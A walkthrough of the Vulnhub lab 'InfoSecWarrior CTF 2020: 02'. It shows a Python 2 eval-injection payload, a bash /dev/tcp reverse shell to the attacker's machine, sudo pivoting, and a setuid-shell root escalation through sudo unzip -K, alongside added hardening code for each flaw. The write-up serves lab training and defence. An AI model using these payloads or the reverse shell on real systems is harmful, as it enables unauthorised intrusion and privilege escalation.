Vulnhub: InfoSecWarriorBox 2, a detailed walkthrough
阿新 • Published: 2022-12-01
InfoSecWarriorBox 2
Author: jason_huawen
Basic information about the target
Name: InfoSecWarrior CTF 2020: 02
URL:
https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/
Hint: Enumerate Enumerate and Enumerate is the motto to solve this box.
Identifying the target's IP address
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.203.0/16   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:f3:da:85      2     120  PCS Systemtechnik GmbH
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.245  08:00:27:f7:e2:30      2     120  PCS Systemtechnik GmbH
netdiscover, which ships with Kali Linux, shows the target at 192.168.56.245 on the host-only network.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.245 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 04:44 EST
Nmap scan report for bogon (192.168.56.245)
Host is up (0.000076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 89:f2:1b:40:c4:0c:3c:79:39:73:9d:fc:cc:ab:2b:0a (RSA)
|   256 05:db:cf:29:90:f6:e4:3f:4f:74:c9:d2:57:81:6e:ff (ECDSA)
|_  256 9a:7d:f5:dd:90:51:b2:eb:3c:33:36:9f:25:0e:8c:21 (ED25519)
56563/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     Welcome to 
|       ___        __      ____          __        __              _            
|      |_ _|_ __  / _| ___/ ___|  ___  __\ \      / /_ _ _ __ _ __(_) ___  _ __ 
|       | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
|       | || | | | |  _| (_) |__) |  __/ (__ \ V  V / (_| | |  | |  | | (_) | |   
|      |___|_| |_|_|  \___/____/ \___|\___| \_/\_/ \__,_|_|  |_|  |_|\___/|_|   
|     Please input number of ping packet you want to send??: Traceback (most recent call last):
|     File "./script.py", line 18, in <module>
|     int(input(' Please input number of ping packet you want to send??: '))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   NULL: 
|     Welcome to 
|       ___        __      ____          __        __              _            
|      |_ _|_ __  / _| ___/ ___|  ___  __\ \      / /_ _ _ __ _ __(_) ___  _ __ 
|       | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
|       | || | | | |  _| (_) |__) |  __/ (__ \ V  V / (_| | |  | |  | | (_) | |   
|      |___|_| |_|_|  \___/____/ \___|\___| \_/\_/ \__,_|_|  |_|  |_|\___/|_|   
|_    Please input number of ping packet you want to send??: 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port56563-TCP:V=7.92%I=7%D=12/1%Time=63887772%P=x86_64-pc-linux-gnu%r(N
SF:ULL,216,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x
SF:20\x20\x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\
SF:x20\x20___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x
SF:20__\x20_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x2
SF:0'_\x20\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x2
SF:0\\\x20/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\
SF:x20'__\|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x2
SF:0\|__\)\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\
SF:|\x20\|\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x2
SF:0\r\n\x20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x2
SF:0\\_/\\_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x
SF:20\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20pi
SF:ng\x20packet\x20you\x20want\x20to\x20send\?\?:\x20")%r(GenericLines,30B
SF:,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x20\x20\
SF:x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\x20\x20
SF:___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x20__\x2
SF:0_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x20'_\x20
SF:\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x20\\\x20
SF:/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\x20'__\
SF:|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x20\|__\)
SF:\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\|\x20\|
SF:\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x20\r\n\x
SF:20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x20\\_/\\
SF:_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x20\r\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20ping\x20p
SF:acket\x20you\x20want\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recen
SF:t\x20call\x20last\):\r\n\x20\x20File\x20\"\./script\.py\",\x20line\x201
SF:8,\x20in\x20<module>\r\n\x20\x20\x20\x20num\x20=\x20int\(input\('\x20Pl
SF:ease\x20input\x20number\x20of\x20ping\x20packet\x20you\x20want\x20to\x2
SF:0send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x
SF:20\x20\x20\x20\r\n\x20\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20E
SF:OF\x20while\x20parsing\r\n");
MAC Address: 08:00:27:F7:E2:30 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
The Nmap scan shows two open ports: 22 (SSH, OpenSSH 7.6p1 on Ubuntu) and 56563, an unrecognised service whose banner ends in a Python traceback from ./script.py.
Getting a shell
The SSH service offers nothing obviously exploitable, so the work centres on port 56563. Opening it in a browser returns:
Welcome to 
 
  ___        __      ____          __        __              _            
 |_ _|_ __  / _| ___/ ___|  ___  __\ \      / /_ _ _ __ _ __(_) ___  _ __ 
  | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
  | || | | | |  _| (_) |__) |  __/ (__ \ V  V / (_| | |  | |  | | (_) | |   
 |___|_| |_|_|  \___/____/ \___|\___| \_/\_/ \__,_|_|  |_|  |_|\___/|_|   

 Please input number of ping packet you want to send??: Traceback (most recent call last):
  File "./script.py", line 18, in <module>
    num = int(input(' Please input number of ping packet you want to send??: '))
  File "<string>", line 1, in <module>
NameError: name 'GET' is not defined
The traceback points at script.py, and the NameError on 'GET' is the tell: the browser sent the request line "GET / HTTP/1.1", the service tried to evaluate it as Python, and it failed on the first name. So this is not a web service but a Python 2 script whose input() evaluates whatever the client sends. Connect with telnet instead:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to 
 
  ___        __      ____          __        __              _            
 |_ _|_ __  / _| ___/ ___|  ___  __\ \      / /_ _ _ __ _ __(_) ___  _ __ 
  | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
  | || | | | |  _| (_) |__) |  __/ (__ \ V  V / (_| | |  | |  | | (_) | |   
 |___|_| |_|_|  \___/____/ \___|\___| \_/\_/ \__,_|_|  |_|  |_|\___/|_|   
Please input number of ping packet you want to send??: 1
ping target (CTF.InfoSecWarrior)...
64 bytes from 127.0.0.1: icmp_seq=1 ttl=31337 time=0.028 ms
Connection closed by foreign host.
The back end appears to run something like ping -c {num} 127.0.0.1 (the ttl=31337 suggests the reply is fabricated, but that does not matter). What matters is the traceback seen earlier: num = int(input(...)) on Python 2, where input() is eval(raw_input()), so the "number" is evaluated as a Python expression before int() ever sees it. Sending __import__('os').system("/bin/bash") therefore runs bash with the privileges of the service:
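The two ways of reading that prompt, as an added example rather than the box's script.py: a Python 3 stand-in for Python 2's input() (an explicit eval, which is the bug) beside a hardened parser that accepts only a bounded decimal count and builds the ping argv without a shell. MAX_PACKETS and the function names are this example's own choices, not anything from the target.

```python
"""Added example, not the box's script.py: why Python 2 input() is an eval sink
and how the packet-count prompt should have been read.

On Python 2, input() is eval(raw_input()), so the "number of ping packets" the
service asks for is evaluated as a Python expression before int() sees it. The
vulnerable function reproduces that on Python 3 with an explicit eval(); the
hardened one accepts only a small decimal integer and builds the ping argv
without a shell.
"""
import re

MAX_PACKETS = 10   # assumed limit for the example; the real script had none


def py2_style_input(line: str):
    """Mimic Python 2 input(): the client's text is evaluated as Python code.

    This is the bug. A client can send __import__('os').system('/bin/bash')
    and it runs with the service's privileges.
    """
    return eval(line)  # deliberately unsafe, kept to show the behaviour


def safe_packet_count(line: str) -> int:
    """Accept only 1..MAX_PACKETS written as a plain decimal; reject anything else."""
    text = line.strip()
    if not re.fullmatch(r"[1-9][0-9]*", text):
        raise ValueError("packet count must be a positive decimal integer")
    count = int(text)
    if count > MAX_PACKETS:
        raise ValueError("packet count exceeds %d" % MAX_PACKETS)
    return count


def rejects(line: str) -> bool:
    """True if safe_packet_count refuses the input (used to check the hardening)."""
    try:
        safe_packet_count(line)
    except ValueError:
        return True
    return False


def ping_argv(line: str, target: str = "127.0.0.1") -> list:
    """argv for subprocess.run(..., shell=False): the count can only be a number."""
    return ["ping", "-c", str(safe_packet_count(line)), target]


if __name__ == "__main__":
    payload = "__import__('os').getpid()"   # harmless stand-in for system('/bin/bash')
    print("py2-style input() evaluated the payload:", py2_style_input(payload))
    print("hardened parser rejects it:", rejects(payload))
    print("hardened argv for '3':", ping_argv("3"))
```

The harmless payload reaches the os module just as the real one does; the difference is only in what it asks os to do. On Python 2 the fix is raw_input() plus the same validation, and on either version the count should be passed to ping as an argv element, never through a shell string.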
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to 
 
  ___        __      ____          __        __              _            
 |_ _|_ __  / _| ___/ ___|  ___  __\ \      / /_ _ _ __ _ __(_) ___  _ __ 
  | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
  | || | | | |  _| (_) |__) |  __/ (__ \ V  V / (_| | |  | |  | | (_) | |   
 |___|_| |_|_|  \___/____/ \___|\___| \_/\_/ \__,_|_|  |_|  |_|\___/|_|   
Please input number of ping packet you want to send??: __import__('os').system("/bin/bash")
bash: cannot set terminal process group (15800): Inappropriate ioctl for device
bash: no job control in this shell
bla1@ck04:~$ bla1@ck04:~$ id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$ bla1@ck04:~$
bla1@ck04:~$ cat bla2-note
cat bla2-note
My group password is czNjcjN0
I encoded my gpasswd :-P
bla1@ck04:~$
bla1@ck04:~$ id
id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$
bla1@ck04:~$ cd /home
cd /home
bla1@ck04:/home$
bla1@ck04:/home$ ls
ls
bla bla1 bla2 ck04
bla1@ck04:/home$
bla2-note does contain a password, but a group password: czNjcjN0 is base64 for s3cr3t, the kind of secret newgrp or sg would ask for to join the bla2 group. That route is not followed here; try the ck04 account over SSH instead:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh ck04@192.168.56.245
The authenticity of host '192.168.56.245 (192.168.56.245)' can't be established.
ED25519 key fingerprint is SHA256:1ZORKwkYqKUIbnD6szqzCNxwimK6Qi1HbDH7ze1nhWE.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:34: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.245' (ED25519) to the list of known hosts.
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
ck04@192.168.56.245's password:
The pre-authentication banner hints that ck04's password is derived from the hostname and the distribution codename. The hostname, ck04, is already visible in the prompt; the codename needs a look at the release files:
bla1@ck04:/home/ck04$ uname -a
uname -a
Linux ck04 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
The codename is bionic.
Logging in as ck04 with bionic as the password succeeds, but the session closes after a single command. The script named shell in ck04's home directory matches the behaviour seen over SSH: it prints user.txt, reads one line, and runs that line inside a command substitution:
bla1@ck04:/home/ck04$ cat shell
cat shell
#!/bin/sh
cat /home/bla/user.txt
read ip
echo `$ip` command not found
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
So typing /bin/bash at that read prompt makes the script execute bash:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh ck04@192.168.56.245
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
ck04@192.168.56.245's password:
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
/bin/bash
ck04@ck04:~$
That bash is usable but nearly blind: it runs inside the backticks of echo `$ip`, so everything it writes to stdout is captured by the command substitution and never reaches the terminal, and only the prompt, which bash writes to stderr, gets through. nc is not installed (which nc prints nothing), so use bash's /dev/tcp pseudo-device for a reverse shell whose stdin, stdout and stderr are the socket rather than the captured pipe:
ck04@ck04:/home$ which nc
ck04@ck04:/home$ bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Darkhole]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.245] 34240
ck04@ck04:/home$
The reverse shell behaves normally.
ck04@ck04:~$ sudo -l
sudo -l
Matching Defaults entries for ck04 on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck04 may run the following commands on ck04:
(bla) NOPASSWD: ALL
ck04@ck04:~$
ck04 may run any command as bla through sudo without a password:
ck04@ck04:~$ sudo -u bla /bin/bash
sudo -u bla /bin/bash
id
uid=1000(bla) gid=1000(bla) groups=1000(bla),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bla@ck04:~$ ls
ls
Desktop Downloads Pictures shell Videos
Documents Music Public Templates
bla@ck04:~$ cd /home
cd /home
bla@ck04:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Jan 28 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 bla
drwxr-x--- 3 bla1 bla1 4.0K Feb 14 2020 bla1
drwxrwx--- 3 bla2 bla2 4.0K Feb 14 2020 bla2
drwxr-xr-x 15 ck04 ck04 4.0K Feb 14 2020 ck04
bla@ck04:/home$ cd bla
cd bla
bla@ck04:/home/bla$ ls -alh
ls -alh
total 96K
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 .
drwxr-xr-x 6 root root 4.0K Jan 28 2020 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 bla bla 220 Jan 27 2020 .bash_logout
-rw-r--r-- 1 bla bla 3.7K Jan 27 2020 .bashrc
drwx------ 15 bla bla 4.0K Feb 13 2020 .cache
drwx------ 14 bla bla 4.0K Feb 13 2020 .config
drwx------ 3 root root 4.0K Jan 28 2020 .dbus
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Desktop
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Documents
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Downloads
drwx------ 3 bla bla 4.0K Jan 27 2020 .gnupg
-rw-rw-r-- 1 bla bla 0 Feb 13 2020 .hushlogin
-rw------- 1 bla bla 12K Feb 13 2020 .ICEauthority
drwx------ 3 bla bla 4.0K Jan 27 2020 .local
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Music
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Pictures
-rw-r--r-- 1 bla bla 807 Jan 27 2020 .profile
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Public
-rw-r--r-- 1 bla bla 66 Jan 27 2020 .selected_editor
drwx------ 2 bla bla 4.0K Feb 13 2020 .ssh
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Templates
-rw-rw---- 1 bla bla 1.2K Feb 12 2020 user.txt
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Videos
bla@ck04:/home/bla$ cat user.txt
cat user.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
bla@ck04:/home/bla$
Privilege escalation
bla@ck04:/home/bla$ sudo -l
sudo -l
Matching Defaults entries for bla on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla may run the following commands on ck04:
(root) NOPASSWD: /usr/bin/virtualbox, /usr/bin/unzip
(bla) NOPASSWD: ALL
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
unzip: cannot find or open shell.zip, shell.zip.zip or shell.zip.ZIP.
bla@ck04:/home/bla$ cp /bin/sh .
cp /bin/sh .
bla@ck04:/home/bla$ chmod +s sh
chmod +s sh
bla@ck04:/home/bla$ zip shell.zip sh
zip shell.zip sh
adding: sh (deflated 51%)
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
y
inflating: sh
bla@ck04:/home/bla$ ./sh -p
./sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 40K
drwx------ 7 root root 4.0K Feb 14 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Jan 27 2020 .cache
drwx------ 3 root root 4.0K Jan 28 2020 .config
drwx------ 3 root root 4.0K Jan 27 2020 .gnupg
-rw-r--r-- 1 root root 0 Feb 13 2020 .hushlogin
drwxr-xr-x 3 root root 4.0K Jan 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 850 Feb 14 2020 proof.txt
drwx------ 2 root root 4.0K Feb 13 2020 .ssh
# cat proof.txt
cat proof.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
flag = 1876056353cb2e6253fd0ce121ef1b3f
This flag is a proof that you got the root shell.
You have to submit your report contaning all steps you take to got root shell.
Send your report at our e-mail address : [email protected] & [email protected]
#
sudo -l as bla shows /usr/bin/unzip and /usr/bin/virtualbox runnable as root without a password. GTFOBins documents the unzip route: zip stores each file's Unix mode bits, setuid included, in the archive; unzip normally clears setuid/setgid bits on extraction for exactly this reason, but -K keeps them; and because unzip runs as root, the recreated file is owned by root. The result is a setuid-root copy of sh, and -p tells it (dash on Ubuntu) not to drop the effective uid:
cp /bin/sh .
chmod +s sh
zip shell.zip sh
sudo unzip -K shell.zip
./sh -p
This gives a root shell and the root flag. The sudoers entry is the real defect: any archiver that honours stored permissions is equivalent to root when run as root, so unzip (and virtualbox) should not appear in a NOPASSWD rule.
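What unzip -K relies on, shown at the ZIP level as an added example that is not part of the box or of GTFOBins: the functions below build an archive whose single entry carries mode 4755 (what chmod +s sh followed by zip produces) next to a plain one, and run the check a wrapper should perform before a root process extracts anything. The shell stub, file names and temp directory are constructed for the example; nothing here needs root.

```python
"""Added example, not from the box: what unzip -K relies on, and a check to run
before letting a root process extract an archive.

zip copies each file's Unix mode (setuid bit included) into the entry's
external_attr; unzip -K honours those bits instead of clearing them, and since
the extracting process is root the recreated file is root-owned. The functions
below build such an archive in a temp dir and inspect it; no privileges needed.
"""
import os
import stat
import tempfile
import zipfile

# Constructed stand-in for the copied /bin/sh; the bytes do not matter to the check.
SHELL_STUB = b"#!/bin/sh\nexec /bin/sh \"$@\"\n"


def build_zip(archive_path: str, setuid: bool, member: str = "sh") -> str:
    """Write a one-entry archive; with setuid=True the entry is mode 4755 like chmod +s sh."""
    mode = stat.S_IFREG | (0o4755 if setuid else 0o755)
    info = zipfile.ZipInfo(member)
    info.create_system = 3              # 3 = Unix: unzip only trusts Unix mode bits then
    info.external_attr = mode << 16     # Info-ZIP keeps st_mode in the high 16 bits
    with zipfile.ZipFile(archive_path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(info, SHELL_STUB)
    return archive_path


def entry_modes(archive_path: str) -> dict:
    """Member name -> permission bits as unzip -K would apply them."""
    with zipfile.ZipFile(archive_path) as zf:
        return {i.filename: (i.external_attr >> 16) & 0o7777 for i in zf.infolist()}


def privileged_entries(archive_path: str) -> list:
    """Members that would come out setuid/setgid under unzip -K; refuse such archives as root."""
    return sorted(name for name, mode in entry_modes(archive_path).items()
                  if mode & (stat.S_ISUID | stat.S_ISGID))


def demo() -> dict:
    """Build the attacker's shell.zip next to a harmless one and report what the check flags."""
    with tempfile.TemporaryDirectory() as d:
        evil = build_zip(os.path.join(d, "shell.zip"), setuid=True)
        plain = build_zip(os.path.join(d, "plain.zip"), setuid=False)
        return {
            "shell.zip": {"flagged": privileged_entries(evil), "mode": oct(entry_modes(evil)["sh"])},
            "plain.zip": {"flagged": privileged_entries(plain), "mode": oct(entry_modes(plain)["sh"])},
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The same entry_modes reading works on archives produced by the real zip command, since Info-ZIP stores st_mode in the same place. The check only matters as a compensating control; the fix on this box is to remove unzip from the sudoers rule.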